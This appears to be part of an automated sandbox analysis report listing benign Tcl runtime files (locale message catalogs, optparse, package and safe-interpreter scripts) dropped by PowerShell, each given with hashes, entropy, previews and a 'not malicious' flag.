                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset th DAYS_OF_WEEK_ABBREV [list \.. "\u0e2d\u0e32."\.. "\u0e08."\.. "\u0e2d."\.. "\u0e1e."\.. "\u0e1e\u0e24."\.. "\u0e28."\.. "\u0e2a."].. ::msgcat::mcset th DAYS_OF_WEEK_FULL [list \.. "\u0e27\u0e31\u0e19\u0e2d\u0e32\u0e17\u0e34\u0e15\u0e22\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e08\u0e31\u0e19\u0e17\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e2d\u0e31\u0e07\u0e04\u0e32\u0e23"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e38\u0e18"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e24\u0e2b\u0e31\u0e2a\u0e1a\u0e14\u0e35"\.. "\u0e27\u0e31\u0e19\u0e28\u0e38\u0e01\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e40\u0e2a\u0e32\u0e23\u0e4c"].. ::msgcat::mcset th MONTHS_ABBREV [list \.. "\u0e21.\u0e04."\.. "\u0e01.\u0e1e."\.. "\u0e21\u0e35.\u0e04."\.. "\u0e40\u0e21.\u0e22."\.. "\u0e1e.\u0e04."\.. "\u0e21\u0
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1183
                                                                                                                                                                                                                              Entropy (8bit):4.390397293529625
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83ZVUflVdq4qTr6dyX59508THHCh5LbQgWiNv9KvWIn:43PXTtbTngLhWiJGWIn
                                                                                                                                                                                                                              MD5:017F0F989BD5DBBF25E7C797CE09C45C
                                                                                                                                                                                                                              SHA1:162922DBD55A31A74410375A36EE7BC50E092BDD
                                                                                                                                                                                                                              SHA-256:4B85B345D6C43F7257C6849A60A492397FD5FD9D82DF3A2252189D7A1ECCBB64
                                                                                                                                                                                                                              SHA-512:73B6CF395753D863330687404E8A584CB08B81A8CC456DCE7BB49C4EA15EA19E45E3CC1E1367E10915DE14AC6258383289BCFEF55AD2768A50889DF390D37EF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset tr DAYS_OF_WEEK_ABBREV [list \.. "Paz"\.. "Pzt"\.. "Sal"\.. "\u00c7ar"\.. "Per"\.. "Cum"\.. "Cmt"].. ::msgcat::mcset tr DAYS_OF_WEEK_FULL [list \.. "Pazar"\.. "Pazartesi"\.. "Sal\u0131"\.. "\u00c7ar\u015famba"\.. "Per\u015fembe"\.. "Cuma"\.. "Cumartesi"].. ::msgcat::mcset tr MONTHS_ABBREV [list \.. "Oca"\.. "\u015eub"\.. "Mar"\.. "Nis"\.. "May"\.. "Haz"\.. "Tem"\.. "A\u011fu"\.. "Eyl"\.. "Eki"\.. "Kas"\.. "Ara"\.. ""].. ::msgcat::mcset tr MONTHS_FULL [list \.. "Ocak"\.. "\u015eubat"\.. "Mart"\.. "Nisan"\.. "May\u0131s"\.. "Haziran"\.. "Temmuz"\.. "A\u011fustos"\.. "Eyl\u00fcl"\.. "Ekim"\.. "Kas\u0131m"\.. "Aral\u
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2165
                                                                                                                                                                                                                              Entropy (8bit):4.289021158621493
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:436yILgoQjQPxUIkgPDRQnQ0vVQbC1iQwweIgWQDIoZI7QDI3QbI87IVQnIzQ7mh:2AzUe3EhV8CYgrbH7z3fLVTzgn5jyX7p
                                                                                                                                                                                                                              MD5:323BD95809A44B0BADC71AD36E5F095B
                                                                                                                                                                                                                              SHA1:44F6016873CA955D27545C56CCD24BDB06A83C43
                                                                                                                                                                                                                              SHA-256:7093DA7E39CEB6D3F51EB6CF1CCA2D7F3680ED7B8FE4A5F0CECEEF6BEB21AC77
                                                                                                                                                                                                                              SHA-512:DB16E0E2D17CE47673DE781A7171944C14CC550FB8EB0920C05B979E4D067E36DF0B59B8BFA81F82D8FCE1FFDDAAD2755E68BFE5BC0DBB11E8716A4D18BA5F7E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset uk DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0432\u0442"\.. "\u0441\u0440"\.. "\u0447\u0442"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset uk DAYS_OF_WEEK_FULL [list \.. "\u043d\u0435\u0434\u0456\u043b\u044f"\.. "\u043f\u043e\u043d\u0435\u0434\u0456\u043b\u043e\u043a"\.. "\u0432\u0456\u0432\u0442\u043e\u0440\u043e\u043a"\.. "\u0441\u0435\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440"\.. "\u043f'\u044f\u0442\u043d\u0438\u0446\u044f"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset uk MONTHS_ABBREV [list \.. "\u0441\u0456\u0447"\.. "\u043b\u044e\u0442"\.. "\u0431\u0435\u0440"\.. "\u043a\u0432\u0456\u0442"\.. "\u0442\u0440\u0430\u0432"\.. "\u0447\u0435\u0440\u0432"\.. "\u043b
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1471
                                                                                                                                                                                                                              Entropy (8bit):4.44729506678271
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR836DNjYTP55YAUy2tJ9kyzW68IFYHMBSW1K1pvhv1O:43dbYJyC8ySgI1dV1O
                                                                                                                                                                                                                              MD5:C127F54C462917D3B3EEF5F29F612138
                                                                                                                                                                                                                              SHA1:B1D9A67F856D93F98524C6372B352EA0DE1B9CD3
                                                                                                                                                                                                                              SHA-256:E9B7AECD456F1D2288604C982B5DED0DCF71DCA968C0B0EAFF4CA16CC3B73EC2
                                                                                                                                                                                                                              SHA-512:0B0F132F10580751258D37E070338C3B39DF57FDECDB9D0AFA67E90D6766DDCB4D711876E551ED759D177F1B8F4E9E1DD8F7899F7CB57F8039F55EC4C2984E87
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset vi DAYS_OF_WEEK_ABBREV [list \.. "Th 2"\.. "Th 3"\.. "Th 4"\.. "Th 5"\.. "Th 6"\.. "Th 7"\.. "CN"].. ::msgcat::mcset vi DAYS_OF_WEEK_FULL [list \.. "Th\u01b0\u0301 hai"\.. "Th\u01b0\u0301 ba"\.. "Th\u01b0\u0301 t\u01b0"\.. "Th\u01b0\u0301 n\u0103m"\.. "Th\u01b0\u0301 s\u00e1u"\.. "Th\u01b0\u0301 ba\u0309y"\.. "Chu\u0309 nh\u00e2\u0323t"].. ::msgcat::mcset vi MONTHS_ABBREV [list \.. "Thg 1"\.. "Thg 2"\.. "Thg 3"\.. "Thg 4"\.. "Thg 5"\.. "Thg 6"\.. "Thg 7"\.. "Thg 8"\.. "Thg 9"\.. "Thg 10"\.. "Thg 11"\.. "Thg 12"\.. ""].. ::msgcat::mcset vi MONTHS_FULL [list \.. "Th\u00e1ng m\u00f4\u0323t"\.. "Th\u00e1ng hai"\.. "Th\u00e1ng ba"\.. "Th\u00e1ng t\u01b0"\.. "Th\u00e
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1598), with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3385
                                                                                                                                                                                                                              Entropy (8bit):4.5164095151631125
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43qrY2BBT7uxDqwPqDa8c3FLbYmhyvMDKbW0YGLuoEyke2gdr:2yPTKdo
                                                                                                                                                                                                                              MD5:2F356DE14D48B1091DEAA32D20C38D96
                                                                                                                                                                                                                              SHA1:4AB78D47A73290000955A7C1DFDF7106093F69FD
                                                                                                                                                                                                                              SHA-256:EB247F5184A59414D3DF7E3ECA51F5998C248CFB27D2C02E62A7A30AB35197A7
                                                                                                                                                                                                                              SHA-512:602410830018B455C68AE2EBDD83BA561CF59DA5898E00C80CE7EF619912E591EB38B4C8FE8D9B1F024E7105B0C4D2D326FC855F31E79C1B954429B947DFFBB1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh DAYS_OF_WEEK_ABBREV [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh DAYS_OF_WEEK_FULL [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh MONTHS_ABBREV [list \.. "\u4e00\u6708"\.. "\u4e8c\u6708"\.. "\u4e09\u6708"\.. "\u56db\u6708"\.. "\u4e94\u6708"\.. "\u516d\u6708"\.. "\u4e03\u6708"\.. "\u516b\u6708"\.. "\u4e5d\u6708"\.. "\u5341\u6708"\.. "\u5341\u4e00\u6708"\.. "\u5341\u4e8c\u6708"\.. ""].. ::msgcat::m
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):319
                                                                                                                                                                                                                              Entropy (8bit):5.167825099880243
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoX5YBoHJ+3vtfNrsoHJ+3v6MYBoXa+3vYq9vn:4EnLB383U5YMJ+3vtN3J+3v6LcL3vYqN
                                                                                                                                                                                                                              MD5:9FCDC2E80E13984D434E3CC91E1ED14C
                                                                                                                                                                                                                              SHA1:710D9EE2A71021F4AB609886138EED43C1380ACD
                                                                                                                                                                                                                              SHA-256:4C8A855700FEFE8EE21B08030FF4159D8011AE50353F063229C42DE6292475CF
                                                                                                                                                                                                                              SHA-512:D899A1F58DF1051BB2C2C4AC859C52A2D19B1593C37022A29439B37A8057ADC3941F3564E2E1D9CEB72AE123A4E12E24C3736343AA3A5EC8749AB5AEBBF65085
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_CN DATE_FORMAT "%Y-%m-%e".. ::msgcat::mcset zh_CN TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset zh_CN TIME_FORMAT_12 "%P%I\u65f6%M\u5206%S\u79d2".. ::msgcat::mcset zh_CN DATE_TIME_FORMAT "%Y-%m-%e %k:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):780
                                                                                                                                                                                                                              Entropy (8bit):4.716025632367214
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383HmSBBHZovDh4ToC4qU3WwVW3v6P3v3WwSn:4aR83Hxo14u3Ww+viv3WwS
                                                                                                                                                                                                                              MD5:CFDA7B6463305FA15DBBA72D725A1876
                                                                                                                                                                                                                              SHA1:2BF885073FBAF4A38B7AFDA76CA391F195A5A362
                                                                                                                                                                                                                              SHA-256:7E1C5BD9EC1A17BB851B0DCABD0DFA9FF9D64B89603D9D3FBEAAC609172346AE
                                                                                                                                                                                                                              SHA-512:55F974C706933ECE0575A33C381D9B370B8A408C5C5514C805EC04C8B0CA5BAFAA47267DA98E1805B478A9589FFB7549D79002B2A7AF387049011D78DD7605B6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_HK DAYS_OF_WEEK_ABBREV [list \.. "\u65e5"\.. "\u4e00"\.. "\u4e8c"\.. "\u4e09"\.. "\u56db"\.. "\u4e94"\.. "\u516d"].. ::msgcat::mcset zh_HK MONTHS_ABBREV [list \.. "1\u6708"\.. "2\u6708"\.. "3\u6708"\.. "4\u6708"\.. "5\u6708"\.. "6\u6708"\.. "7\u6708"\.. "8\u6708"\.. "9\u6708"\.. "10\u6708"\.. "11\u6708"\.. "12\u6708"\.. ""].. ::msgcat::mcset zh_HK DATE_FORMAT "%Y\u5e74%m\u6708%e\u65e5".. ::msgcat::mcset zh_HK TIME_FORMAT_12 "%P%I:%M:%S".. ::msgcat::mcset zh_HK DATE_TIME_FORMAT "%Y\u5e74%m\u6708%e\u65e5 %P%I:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):347
                                                                                                                                                                                                                              Entropy (8bit):5.062880051437783
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoOpEoPpFocMohX3v6Zwoh+3v6fxvn:4EnLB383J53v6O3vCn
                                                                                                                                                                                                                              MD5:3218F8E6BEDD534277DE0849C423158E
                                                                                                                                                                                                                              SHA1:10C006446A10406A5644C4033665E877EBF72AF7
                                                                                                                                                                                                                              SHA-256:500546B3211D454659D845B4AB9AEF226125100DF40407C49530DE17CDD4363F
                                                                                                                                                                                                                              SHA-512:3142893DA85BA8F83A5B6851B313B5F5FF80D2B989C1AE015665EE70373249B44EFB4FF7C621F1D8F37AC6019EF5E8D6D21C76C48998C3D9072F9C5060AA8813
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_SG AM "\u4e0a\u5348".. ::msgcat::mcset zh_SG PM "\u4e2d\u5348".. ::msgcat::mcset zh_SG DATE_FORMAT "%d %B %Y".. ::msgcat::mcset zh_SG TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_SG DATE_TIME_FORMAT "%d %B %Y %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):354
                                                                                                                                                                                                                              Entropy (8bit):5.124064818715749
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoAykaRULH/XRxy/5oAyjZRULHi5oAyU/G0OMoAyxW3v6ZQ:4EnLB38315xDOiKRRW3v6F3v8A2n
                                                                                                                                                                                                                              MD5:9010E34791B5DDB7F1E0AD4DA6BD4623
                                                                                                                                                                                                                              SHA1:418F7374BABEF27FEC8E00D3A32F535084593AB9
                                                                                                                                                                                                                              SHA-256:DBA0584B8E1925B439F06E0BF0965E97AFB7EB39E70E0E4C9B70769EBC5F996C
                                                                                                                                                                                                                              SHA-512:D3AB698B725E84DAB06E472C41FF2EB55D63885D22B4598C596800BAC83A02A44CB524524F267D090952AF7E0031F47720786ACF9E354EF672CF9EEFB7DB3BD4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_TW BCE "\u6c11\u570b\u524d".. ::msgcat::mcset zh_TW CE "\u6c11\u570b".. ::msgcat::mcset zh_TW DATE_FORMAT "%Y/%m/%e".. ::msgcat::mcset zh_TW TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_TW DATE_TIME_FORMAT "%Y/%m/%e %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33777
                                                                                                                                                                                                                              Entropy (8bit):4.60013086740989
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:4D0xrpIuhenN4kA0G6sRcl5AdtsPLKiF64aJQ2L:HpnhsS9C5Adqua5aJvL
                                                                                                                                                                                                                              MD5:4ECD97188BFED58A15FE22EC566FA6A3
                                                                                                                                                                                                                              SHA1:6E4E91096298F1A0AE6CD4241F167C8B4F661EE5
                                                                                                                                                                                                                              SHA-256:67A157F1873D606B53DC4D894BD8E71F6B1A0DD66177B9513BD039B348B40349
                                                                                                                                                                                                                              SHA-512:1D5067BBB13DAB001168EEB41EBFA2D13BACB0F43A8067CC93923E8F4D062AA387DA23D7D98D6A2AE77D7C849A6026F2343102CBE03690C2CEA0890222339475
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# optparse.tcl --..#..# (private) Option parsing package..# Primarily used internally by the safe:: code...#..#.WARNING: This code will go away in a future release..#.of Tcl. It is NOT supported and you should not rely..#.on it. If your code does rely on this package you..#.may directly incorporate this code into your application.....package require Tcl 8.5-..# When this version number changes, update the pkgIndex.tcl file..# and the install directory in the Makefiles...package provide opt 0.4.8....namespace eval ::tcl {.... # Exported APIs.. namespace export OptKeyRegister OptKeyDelete OptKeyError OptKeyParse \.. OptProc OptProcArgGiven OptParse \... Lempty Lget \.. Lassign Lvarpop Lvarpop1 Lvarset Lvarincr \.. SetMax SetMin......################# Example of use / 'user documentation' ###################.... proc OptCreateTestProc {} {.....# Defines ::tcl::OptParseTest as a test proc with parsed arguments...# (can't be d
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):620
                                                                                                                                                                                                                              Entropy (8bit):4.702477618616754
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:jHxIRu9zhjJS42wbGlTULuUAZb3KykszLYIGbyAkXaqrQ+pBb6:biRUJS42wbGlTUcZ+yk2LY0XaqrB4
                                                                                                                                                                                                                              MD5:07532085501876DCC6882567E014944C
                                                                                                                                                                                                                              SHA1:6BC7A122429373EB8F039B413AD81C408A96CB80
                                                                                                                                                                                                                              SHA-256:6A4ABD2C519A745325C26FB23BE7BBF95252D653A24806EB37FD4AA6A6479AFE
                                                                                                                                                                                                                              SHA-512:0D604E862F3A1A19833EAD99AAF15A9F142178029AB64C71D193CEE4901A0196C1EEDDC2BCE715B7FA958AC45C194E63C77A71E4BE4F9AEDFD5B44CF2A726E76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Tcl package index file, version 1.1..# This file is generated by the "pkg_mkIndex -direct" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....if {![package vsatisfies [package provide Tcl] 8.5-]} {return}..package ifneeded opt 0.4.8 [list source [file join $dir optparse.tcl]]..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):23995
                                                                                                                                                                                                                              Entropy (8bit):4.884828325514459
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:8xgjLNILEHsdAW2UfnImRqXqux6XmihmCchzPLrXJjJh6PLfzdklG:8xgjLNImsdnvIm86uGLhLchzDzJ9h6Dn
                                                                                                                                                                                                                              MD5:DDB0AB9842B64114138A8C83C4322027
                                                                                                                                                                                                                              SHA1:ECCACDC2CCD86A452B21F3CF0933FD41125DE790
                                                                                                                                                                                                                              SHA-256:F46AB61CDEBE3AA45FA7E61A48930D64A0D0E7E94D04D6BF244F48C36CAFE948
                                                                                                                                                                                                                              SHA-512:C0CF718258B4D59675C088551060B34CE2BC8638958722583AC2313DC354223BFEF793B02F1316E522A14C7BA9BED219531D505DE94DC3C417FC99D216A01463
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# package.tcl --..#..# utility procs formerly in init.tcl which can be loaded on demand..# for package management...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval tcl::Pkg {}....# ::tcl::Pkg::CompareExtension --..#..# Used internally by pkg_mkIndex to compare the extension of a file to a given..# extension. On Windows, it uses a case-insensitive comparison because the..# file system can be file insensitive...#..# Arguments:..# fileName.name of a file whose extension is compared..# ext..(optional) The extension to compare against; you must..#..provide the starting dot...#..Defaults to [info sharedlibextension]..#..# Results:..# Returns 1 if the extension matches, 0 otherwise....proc tcl::Pkg::CompareExtension {fileName {ext {}}} {.. global tcl_platfor
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):844
                                                                                                                                                                                                                              Entropy (8bit):4.883013702569192
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:TF7S2n2wn2SNHaeYF9xcwrmXhbs1GUiSYX3EtSK78ex4VIpynEw88/McUBbPgnz:TF7Hn2wnlk2KwyZSM4SkV/3UB7Cz
                                                                                                                                                                                                                              MD5:577787C2F4F5956BA70F83012B980AE5
                                                                                                                                                                                                                              SHA1:040B2469F796F3FDFCD1E1DD2EB1C5B799EDEF62
                                                                                                                                                                                                                              SHA-256:E269029C8263E3CBC1920C3604ECDCF15EDCCB208A0D68F9EB42B73954D620C0
                                                                                                                                                                                                                              SHA-512:C2940F6F3D77412EFC537B8AB67352F519DFFA95739FCC17BF1817335AFD9E5BFE91ABE98CBA99E278CB4923D4E6D431ED9D72282745203C0F7D73193F550238
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# parray:..# Print the contents of a global array on stdout...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....proc parray {a {pattern *}} {.. upvar 1 $a array.. if {![array exists array]} {...return -code error "\"$a\" isn't an array".. }.. set maxl 0.. set names [lsort [array names array $pattern]].. foreach name $names {...if {[string length $name] > $maxl} {... set maxl [string length $name]...}.. }.. set maxl [expr {$maxl + [string length $a] + 2}].. foreach name $names {...set nameString [format %s(%s) $a $name]...puts stdout [format "%-*s = %s" $maxl $nameString $array($name)].. }..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):42223
                                                                                                                                                                                                                              Entropy (8bit):4.822635446297551
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:H/Jo8y7AyARYhZfc3njlVdRIp4xOtoYx4WneNiBq5vIhfwEaqadlUCJ2Pbb1P6:H/c7AmhZmnjvdRIG924WneNiBq5+fwEc
                                                                                                                                                                                                                              MD5:B8C1561D471CFBF4111C706411D59883
                                                                                                                                                                                                                              SHA1:71483EAEEF377EE9AF90BEC44F70C7B12C5BC720
                                                                                                                                                                                                                              SHA-256:C21DCE3AB31893118BBED01E559070F1D3541877FEE331BD45F5BF4300ED9654
                                                                                                                                                                                                                              SHA-512:465065A938C71AF4588B3331B51A62DD57F57492EB1CB6C0F52B9FD0A2FE7A54B1E995AA56E4A41D7A99EAFF665C1E23E3B240FB3F9840AB242C21B1DBFFFF45
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# safe.tcl --..#..# This file provide a safe loading/sourcing mechanism for safe interpreters...# It implements a virtual path mechanism to hide the real pathnames from the..# child. It runs in a parent interpreter and sets up data structure and..# aliases that will be invoked when used from a child interpreter...#..# See the safe.n man page for details...#..# Copyright (c) 1996-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....#..# The implementation is based on namespaces. These naming conventions are..# followed:..# Private procs starts with uppercase...# Public procs are exported and starts with lowercase..#....# Needed utilities package..package require opt 0.4.8....# Create the safe namespace..namespace eval ::safe {.. # Exported API:.. namespace export interpCreate interpInit interpConfigure interpDelete \...interpAddToAccessPath interpFindInAccessPath setL
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5617
                                                                                                                                                                                                                              Entropy (8bit):4.747404679682368
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:eOaVhNUMUuUQU2UsUIUbUEUEeUkgU6UWSO0DT5RTdcvsilrvs+jscMK57ehXowrz:ejVHRRLP3LWDXewTbSO0DT5RTdcvsilg
                                                                                                                                                                                                                              MD5:C62FB22F4C9A3EFF286C18421397AAF4
                                                                                                                                                                                                                              SHA1:4A49B8768CFF68F2EFFAF21264343B7C632A51B2
                                                                                                                                                                                                                              SHA-256:DDF7E42DEF37888AD0A564AA4F8CA95F4EEC942CEBEBFCA851D35515104D5C89
                                                                                                                                                                                                                              SHA-512:558D401CB6AF8CE3641AF55CAEBC9C5005AB843EE84F60C6D55AFBBC7F7129DA9C58C2F55C887C3159107546FA6BC13FFC4CCA63EA8841D7160B8AA99161A185
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Tcl autoload index file, version 2.0..# -*- tcl -*-..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(auto_reset) [list source [file join $dir auto.tcl]]..set auto_index(tcl_findLibrary) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex_old) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::init) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::cleanup) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::mkindex) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::hook) [list source [file join $dir auto.t
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12204
                                                                                                                                                                                                                              Entropy (8bit):4.763796758810551
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:55CjnlRfMKqaOH5bE2KjNkkpgpCmqkkuowUh9PTYMsvSO+xy8h/vuKisM68E:5q3MKYH5bE1jNkkpgomq/uCPTYMC+k83
                                                                                                                                                                                                                              MD5:215262A286E7F0A14F22DB1AA7875F05
                                                                                                                                                                                                                              SHA1:66B942BA6D3120EF8D5840FCDEB06242A47491FF
                                                                                                                                                                                                                              SHA-256:4B7ED9FD2363D6876092DB3F720CBDDF97E72B86B519403539BA96E1C815ED8F
                                                                                                                                                                                                                              SHA-512:6ECD745D7DA9D826240C0AB59023C703C94B158AE48C1410FAA961A8EDB512976A4F15AE8DEF099B58719ADF0D2A9C37E6F29F54D39C1AB7EE81FA333A60F39B
                                                                                                                                                                                                                              Malicious:false
